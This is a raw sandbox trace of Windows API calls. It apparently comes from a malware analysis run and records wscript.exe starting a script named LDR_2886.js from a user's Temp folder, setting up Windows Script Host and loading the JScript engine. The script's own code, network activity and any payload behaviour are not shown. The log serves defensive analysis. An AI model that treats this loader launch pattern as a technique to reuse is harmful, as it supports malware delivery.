	[0049.812] SendMessageA (hWnd=0x301f2, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0049.812] PostMessageA (hWnd=0x301f2, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0049.813] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x25fa50*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0049.813] CloseHandle (hObject=0xd4) returned 1
	[0049.814] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.814] IUnknown:Release (This=0x41e5f0) returned 0x0
	[0049.814] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.814] IUnknown:Release (This=0x41e6a0) returned 0x0
	[0049.814] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.814] IUnknown:Release (This=0x41e750) returned 0x0
	[0049.814] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.814] IUnknown:Release (This=0x41e540) returned 0x0
	[0049.815] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.815] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.815] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.815] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.815] GetProcessHeap () returned 0x3f0000
	[0049.815] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45ae20 | out: hHeap=0x3f0000) returned 1
	[0049.815] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.815] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x25fa80 | out: lplpMessageFilter=0x25fa80*=0xd5f80) returned 0x0
	[0049.815] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.815] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.815] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0049.815] CoUninitialize () 
	[0049.815] DllCanUnloadNow () returned 0x0
	[0049.815] DllCanUnloadNow () 

Thread:
	id = 27
	os_tid = 0xb64


Thread:
	id = 28
	os_tid = 0xb68

	[0044.659] GetClassInfoA (in: hInstance=0xff410000, lpClassName="WSH-Timer", lpWndClass=0x275fd40 | out: lpWndClass=0x275fd40) returned 0
	[0044.659] RegisterClassA (lpWndClass=0x275fd40) returned 0x9006ac19b
	[0044.659] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff410000, lpParam=0xd5a60) returned 0x301f2
	[0044.660] GetWindowLongPtrA (hWnd=0x301f2, nIndex=-21) returned 0x0
	[0044.660] NtdllDefWindowProc_A (hWnd=0x301f2, Msg=0x24, wParam=0x0, lParam=0x275f730) returned 0x0
	[0044.660] GetWindowLongPtrA (hWnd=0x301f2, nIndex=-21) returned 0x0
	[0044.660] SetWindowLongPtrA (hWnd=0x301f2, nIndex=-21, dwNewLong=0xd5a60) returned 0x0
	[0044.660] NtdllDefWindowProc_A (hWnd=0x301f2, Msg=0x81, wParam=0x0, lParam=0x275f6f0) returned 0x1
	[0044.662] GetWindowLongPtrA (hWnd=0x301f2, nIndex=-21) returned 0xd5a60
	[0044.662] NtdllDefWindowProc_A (hWnd=0x301f2, Msg=0x83, wParam=0x0, lParam=0x275f750) returned 0x0
	[0044.664] GetWindowLongPtrA (hWnd=0x301f2, nIndex=-21) returned 0xd5a60
	[0044.664] NtdllDefWindowProc_A (hWnd=0x301f2, Msg=0x1, wParam=0x0, lParam=0x275f6f0) returned 0x0
	[0044.664] SetEvent (hEvent=0xcc) returned 1
	[0044.684] GetMessageA (in: lpMsg=0x275fd10, hWnd=0x301f2, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x275fd10) returned 0
	[0049.810] GetWindowLongPtrA (hWnd=0x301f2, nIndex=-21) returned 0xd5a60
	[0049.812] GetWindowLongPtrA (hWnd=0x301f2, nIndex=-21) returned 0xd5a60

Thread:
	id = 29
	os_tid = 0xb6c


Thread:
	id = 30
	os_tid = 0xb70


Thread:
	id = 31
	os_tid = 0xb94


Thread:
	id = 32
	os_tid = 0xb98


Thread:
	id = 33
	os_tid = 0xb9c


Thread:
	id = 45
	os_tid = 0x40c


Thread:
	id = 47
	os_tid = 0x500


Process:
	id = "3"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x2651f000"
	os_pid = "0xba4"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 35
	os_tid = 0xba8

	[0047.112] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fdc0 | out: lpSystemTimeAsFileTime=0x30fdc0*(dwLowDateTime=0x9559dd10, dwHighDateTime=0x1d543d1)) 
	[0047.112] GetCurrentProcessId () returned 0xba4
	[0047.112] GetCurrentThreadId () returned 0xba8
	[0047.112] GetTickCount () returned 0x1cffb
	[0047.112] QueryPerformanceCounter (in: lpPerformanceCount=0x30fdc8 | out: lpPerformanceCount=0x30fdc8*=17153810044) returned 1
	[0047.112] GetStartupInfoA (in: lpStartupInfo=0x30fde0 | out: lpStartupInfo=0x30fde0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0047.112] GetModuleHandleA (lpModuleName=0x0) returned 0xff410000
	[0047.112] GetModuleHandleA (lpModuleName=0x0) returned 0xff410000
	[0047.113] GetVersionExA (in: lpVersionInformation=0x30fd00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x101eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x30fd00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0047.113] GetUserDefaultLCID () returned 0x409
	[0047.113] CoInitialize (pvReserved=0x0) returned 0x0
	[0047.263] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0047.263] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0047.263] ??2@YAPEAX_K@Z () returned 0x3657b0
	[0047.263] ??2@YAPEAX_K@Z () returned 0x365f60
	[0047.264] GetCurrentThreadId () returned 0xba8
	[0047.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fa48 | out: phkResult=0x30fa48*=0x7c) returned 0x0
	[0047.264] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fa40 | out: phkResult=0x30fa40*=0x80) returned 0x0
	[0047.264] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x30ed48, lpData=0x30f150, lpcbData=0x30ed40*=0x400 | out: lpType=0x30ed48*=0x0, lpData=0x30f150*=0x67, lpcbData=0x30ed40*=0x400) returned 0x2
	[0047.264] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x30ed48, lpData=0x30f150, lpcbData=0x30ed40*=0x400 | out: lpType=0x30ed48*=0x0, lpData=0x30f150*=0x67, lpcbData=0x30ed40*=0x400) returned 0x2
	[0047.264] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x30ed48, lpData=0x30f150, lpcbData=0x30ed40*=0x400 | out: lpType=0x30ed48*=0x0, lpData=0x30f150*=0x67, lpcbData=0x30ed40*=0x400) returned 0x2
	[0047.264] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0047.670] RegCloseKey (hKey=0x80) returned 0x0
	[0047.670] RegCloseKey (hKey=0x7c) returned 0x0
	[0047.670] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f760 | out: phkResult=0x30f760*=0x7c) returned 0x0
	[0047.670] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f758 | out: phkResult=0x30f758*=0x80) returned 0x0
	[0047.670] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x30ea68, lpData=0x30ee70, lpcbData=0x30ea60*=0x400 | out: lpType=0x30ea68*=0x0, lpData=0x30ee70*=0x0, lpcbData=0x30ea60*=0x400) returned 0x2
	[0047.670] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x30ea68, lpData=0x30ee70, lpcbData=0x30ea60*=0x400 | out: lpType=0x30ea68*=0x0, lpData=0x30ee70*=0x0, lpcbData=0x30ea60*=0x400) returned 0x2
	[0047.670] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x30ea68, lpData=0x30ee70, lpcbData=0x30ea60*=0x400 | out: lpType=0x30ea68*=0x0, lpData=0x30ee70*=0x0, lpcbData=0x30ea60*=0x400) returned 0x2
	[0047.670] RegCloseKey (hKey=0x80) returned 0x0
	[0047.670] RegCloseKey (hKey=0x7c) returned 0x0
	[0047.670] GetACP () returned 0x4e4
	[0047.670] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0047.670] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0047.670] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0047.670] FreeLibrary (hLibModule=0x77040000) returned 1
	[0047.671] ??2@YAPEAX_K@Z () returned 0x365f80
	[0047.671] CoRegisterMessageFilter (in: lpMessageFilter=0x365f80, lplpMessageFilter=0x365f90 | out: lplpMessageFilter=0x365f90*=0x0) returned 0x0
	[0047.672] GetModuleFileNameW (in: hModule=0xff410000, lpFilename=0x30faa0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0047.672] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x30f3f0 | out: lpdwHandle=0x30f3f0) returned 0x704
	[0047.672] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x30ece0 | out: lpData=0x30ece0) returned 1
	[0047.672] VerQueryValueW (in: pBlock=0x30ece0, lpSubBlock="\\", lplpBuffer=0x30f3f8, puLen=0x30f3f4 | out: lplpBuffer=0x30f3f8*=0x30ed08, puLen=0x30f3f4) returned 1
	[0047.672] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f448 | out: phkResult=0x30f448*=0x7c) returned 0x0
	[0047.672] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x30e798, lpData=0x30eba0, lpcbData=0x30e790*=0x400 | out: lpType=0x30e798*=0x0, lpData=0x30eba0*=0x0, lpcbData=0x30e790*=0x400) returned 0x2
	[0047.672] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f400 | out: phkResult=0x30f400*=0x80) returned 0x0
	[0047.672] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x30f3c4, lpData=0x30f440, lpcbData=0x30f3c0*=0x4 | out: lpType=0x30f3c4*=0x0, lpData=0x30f440*=0x70, lpcbData=0x30f3c0*=0x4) returned 0x2
	[0047.672] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x30e798, lpData=0x30eba0, lpcbData=0x30e790*=0x400 | out: lpType=0x30e798*=0x0, lpData=0x30eba0*=0x0, lpcbData=0x30e790*=0x400) returned 0x2
	[0047.673] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x30f3c4, lpData=0x30f440, lpcbData=0x30f3c0*=0x4 | out: lpType=0x30f3c4*=0x0, lpData=0x30f440*=0x70, lpcbData=0x30f3c0*=0x4) returned 0x2
	[0047.673] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x30e798, lpData=0x30eba0, lpcbData=0x30e790*=0x400 | out: lpType=0x30e798*=0x1, lpData="1", lpcbData=0x30e790*=0x4) returned 0x0
	[0047.673] lstrlenW (lpString="1") returned 1
	[0047.673] lstrlenW (lpString="0") returned 1
	[0047.673] lstrlenW (lpString="1") returned 1
	[0047.673] lstrlenW (lpString="no") returned 2
	[0047.673] lstrlenW (lpString="1") returned 1
	[0047.673] lstrlenW (lpString="false") returned 5
	[0047.673] RegCloseKey (hKey=0x80) returned 0x0
	[0047.673] RegCloseKey (hKey=0x7c) returned 0x0
	[0047.673] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x30f448, lpdwDisposition=0x0 | out: phkResult=0x30f448*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0047.673] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x30f3e4, lpData=0x30f440, lpcbData=0x30f3e0*=0x4 | out: lpType=0x30f3e4*=0x0, lpData=0x30f440*=0x70, lpcbData=0x30f3e0*=0x4) returned 0x2
	[0047.673] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x30e7b8, lpData=0x30ebc0, lpcbData=0x30e7b0*=0x400 | out: lpType=0x30e7b8*=0x1, lpData="1", lpcbData=0x30e7b0*=0x4) returned 0x0
	[0047.673] lstrlenW (lpString="1") returned 1
	[0047.673] lstrlenW (lpString="0") returned 1
	[0047.673] lstrlenW (lpString="1") returned 1
	[0047.673] lstrlenW (lpString="no") returned 2
	[0047.674] lstrlenW (lpString="1") returned 1
	[0047.674] lstrlenW (lpString="false") returned 5
	[0047.674] RegCloseKey (hKey=0x7c) returned 0x0
	[0047.674] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x30f448, lpdwDisposition=0x0 | out: phkResult=0x30f448*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0047.674] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x30f3e4, lpData=0x30f440, lpcbData=0x30f3e0*=0x4 | out: lpType=0x30f3e4*=0x0, lpData=0x30f440*=0x70, lpcbData=0x30f3e0*=0x4) returned 0x2
	[0047.674] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x30e7b8, lpData=0x30ebc0, lpcbData=0x30e7b0*=0x400 | out: lpType=0x30e7b8*=0x0, lpData=0x30ebc0*=0x31, lpcbData=0x30e7b0*=0x400) returned 0x2
	[0047.674] RegCloseKey (hKey=0x7c) returned 0x0
	[0047.674] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0047.674] lstrlenW (lpString="js") returned 2
	[0047.674] lstrlenW (lpString="WSH") returned 3
	[0047.674] ??2@YAPEAX_K@Z () returned 0x365870
	[0047.674] LoadStringW (in: hInstance=0xff410000, uID=0x9c5, lpBuffer=0x30deb0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0047.674] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x30eef0*=0x0 | out: pptlib=0x30eef0*=0x12d100) returned 0x0
	[0047.679] ITypeLib:GetTypeInfoOfGuid (in: This=0x12d100, GUID=0xff4158f0, ppTInfo=0x30eed8 | out: ppTInfo=0x30eed8*=0x12e4e8) returned 0x0
	[0047.681] ITypeInfo:GetRefTypeOfImplType (in: This=0x12e4e8, index=0xffffffff, pRefType=0x30eed0 | out: pRefType=0x30eed0*=0xfffffffe) returned 0x0
	[0047.681] ITypeInfo:GetRefTypeInfo (in: This=0x12e4e8, hreftype=0xfffffffe, ppTInfo=0xff42f458 | out: ppTInfo=0xff42f458*=0x12e540) returned 0x0
	[0047.681] IUnknown:Release (This=0x12e4e8) returned 0x1
	[0047.681] ??2@YAPEAX_K@Z () returned 0x365900
	[0047.681] ??2@YAPEAX_K@Z () returned 0x3659a0
	[0047.681] ??2@YAPEAX_K@Z () returned 0x365a00
	[0047.681] ITypeLib:GetTypeInfoOfGuid (in: This=0x12d100, GUID=0xff415950, ppTInfo=0x30eed8 | out: ppTInfo=0x30eed8*=0x12e598) returned 0x0
	[0047.681] ITypeInfo:GetRefTypeOfImplType (in: This=0x12e598, index=0xffffffff, pRefType=0x30eed0 | out: pRefType=0x30eed0*=0xfffffffe) returned 0x0
	[0047.681] ITypeInfo:GetRefTypeInfo (in: This=0x12e598, hreftype=0xfffffffe, ppTInfo=0xff42f4d8 | out: ppTInfo=0xff42f4d8*=0x12e5f0) returned 0x0
	[0047.682] IUnknown:Release (This=0x12e598) returned 0x1
	[0047.682] ITypeLib:GetTypeInfoOfGuid (in: This=0x12d100, GUID=0xff415960, ppTInfo=0x30eed8 | out: ppTInfo=0x30eed8*=0x12e648) returned 0x0
	[0047.682] ITypeInfo:GetRefTypeOfImplType (in: This=0x12e648, index=0xffffffff, pRefType=0x30eed0 | out: pRefType=0x30eed0*=0xfffffffe) returned 0x0
	[0047.682] ITypeInfo:GetRefTypeInfo (in: This=0x12e648, hreftype=0xfffffffe, ppTInfo=0xff42f518 | out: ppTInfo=0xff42f518*=0x12e6a0) returned 0x0
	[0047.682] IUnknown:Release (This=0x12e648) returned 0x1
	[0047.682] ITypeLib:GetTypeInfoOfGuid (in: This=0x12d100, GUID=0xff415910, ppTInfo=0x30eed8 | out: ppTInfo=0x30eed8*=0x12e6f8) returned 0x0
	[0047.682] ITypeInfo:GetRefTypeOfImplType (in: This=0x12e6f8, index=0xffffffff, pRefType=0x30eed0 | out: pRefType=0x30eed0*=0xfffffffe) returned 0x0
	[0047.682] ITypeInfo:GetRefTypeInfo (in: This=0x12e6f8, hreftype=0xfffffffe, ppTInfo=0xff42f498 | out: ppTInfo=0xff42f498*=0x12e750) returned 0x0
	[0047.682] IUnknown:Release (This=0x12e6f8) returned 0x1
	[0047.682] IUnknown:Release (This=0x12d100) returned 0x4
	[0047.682] ??2@YAPEAX_K@Z () returned 0x365a60
	[0047.682] GetCurrentThreadId () returned 0xba8
	[0047.682] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0047.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff421cf8, lpParameter=0x365a60, dwCreationFlags=0x0, lpThreadId=0x365a88 | out: lpThreadId=0x365a88*=0xbb4) returned 0xd4
	[0047.683] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x30f130*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0047.820] CloseHandle (hObject=0xcc) returned 1
	[0047.820] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x30f1c0, lpFilePart=0x30f1b0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x30f1b0*="LDR_2886.js") returned 0x30
	[0047.820] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x30e6d0 | out: phkResult=0x30e6d0*=0xe6) returned 0x0
	[0047.820] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x30e680, lpData=0x30e6e0, lpcbData=0x30e684*=0x800 | out: lpType=0x30e680*=0x1, lpData="JSFile", lpcbData=0x30e684*=0xe) returned 0x0
	[0047.820] RegCloseKey (hKey=0xe6) returned 0x0
	[0047.820] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x30e6d0 | out: phkResult=0x30e6d0*=0xe6) returned 0x0
	[0047.821] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x30e680, lpData=0x30ef50, lpcbData=0x30e684*=0x200 | out: lpType=0x30e680*=0x1, lpData="JScript", lpcbData=0x30e684*=0x10) returned 0x0
	[0047.821] RegCloseKey (hKey=0xe6) returned 0x0
	[0047.821] ??2@YAPEAX_K@Z () returned 0x3663a0
	[0047.821] GetProcessHeap () returned 0x100000
	[0047.821] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x0, Size=0x2000) returned 0x138430
	[0047.821] CLSIDFromString (in: lpsz="JScript", pclsid=0x30eec8 | out: pclsid=0x30eec8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0047.822] CoCreateInstance (in: rclsid=0x30eec8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff411800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30eec0 | out: ppv=0x30eec0*=0x366780) returned 0x0
	[0047.974] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30d0c0 | out: lpSystemTimeAsFileTime=0x30d0c0*(dwLowDateTime=0x95da7ec0, dwHighDateTime=0x1d543d1)) 
	[0047.974] GetCurrentProcessId () returned 0xba4
	[0047.974] GetCurrentThreadId () returned 0xba8
	[0047.974] GetTickCount () returned 0x1d345
	[0047.974] QueryPerformanceCounter (in: lpPerformanceCount=0x30d0c8 | out: lpPerformanceCount=0x30d0c8*=17240041764) returned 1
	[0047.975] malloc (_Size=0x100) returned 0x366670
	[0047.975] __dllonexit () returned 0x7fee3310728
	[0047.975] __dllonexit () returned 0x7fee3310780
	[0047.975] __dllonexit () returned 0x7fee3310750
	[0047.975] __dllonexit () returned 0x7fee33107b0
	[0047.976] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0047.976] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0047.976] EtwRegisterTraceGuidsA () returned 0x0
	[0047.976] EtwRegisterTraceGuidsA () returned 0x0
	[0047.976] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30ccb0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0047.977] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0047.977] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x30ce18 | out: phkResult=0x30ce18*=0x0) returned 0x2
	[0047.981] GetVersion () returned 0x1db10106
	[0047.982] ??2@YAPEAX_K@Z () returned 0x365aa0
	[0047.982] ??2@YAPEAX_K@Z () returned 0x366780
	[0047.982] GetUserDefaultLCID () returned 0x409
	[0047.983] GetACP () returned 0x4e4
	[0047.983] ??3@YAXPEAX@Z () returned 0x165fff01
	[0047.983] GetCurrentThreadId () returned 0xba8
	[0047.983] ??2@YAPEAX_K@Z () returned 0x365aa0
	[0047.983] GetCurrentThreadId () returned 0xba8
	[0047.983] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x30edf8 | out: phkResult=0x30edf8*=0x104) returned 0x0
	[0047.983] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480
	[0047.983] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x30edf0, lpData=0x30ede8, lpcbData=0x30ede0*=0x4 | out: lpType=0x30edf0*=0x4, lpData=0x30ede8*=0x1, lpcbData=0x30ede0*=0x4) returned 0x0
	[0047.984] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0047.984] RegCloseKey (hKey=0x104) returned 0x0
	[0047.984] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0047.984] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0047.984] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0047.984] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0047.984] CoCreateInstance (in: rclsid=0x7fee337cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee337cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30edc0 | out: ppv=0x30edc0*=0x7fefec0a1b0) returned 0x0
	[0047.985] ??2@YAPEAX_K@Z () returned 0x366b30
	[0047.985] ??2@YAPEAX_KHPEBDH@Z () returned 0x365af0
	[0047.985] ??2@YAPEAX_K@Z () returned 0x366bf0
	[0047.985] ??2@YAPEAX_K@Z () returned 0x366c50
	[0047.986] ??2@YAPEAX_K@Z () returned 0x367140
	[0047.986] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x30ed80, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0047.986] GetUserDefaultLCID () returned 0x409
	[0047.986] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0047.986] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30ee20, cchData=6 | out: lpLCData="1252") returned 5
	[0047.986] IsValidCodePage (CodePage=0x4e4) returned 1
	[0047.986] CoCreateInstance (in: rclsid=0x7fee3375d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee3375d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x366af0 | out: ppv=0x366af0*=0x1375b0) returned 0x0
	[0047.986] IUnknown:AddRef (This=0x1375b0) returned 0x2
	[0047.986] GetCurrentProcessId () returned 0xba4
	[0047.986] GetCurrentThreadId () returned 0xba8
	[0047.986] GetTickCount () returned 0x1d355
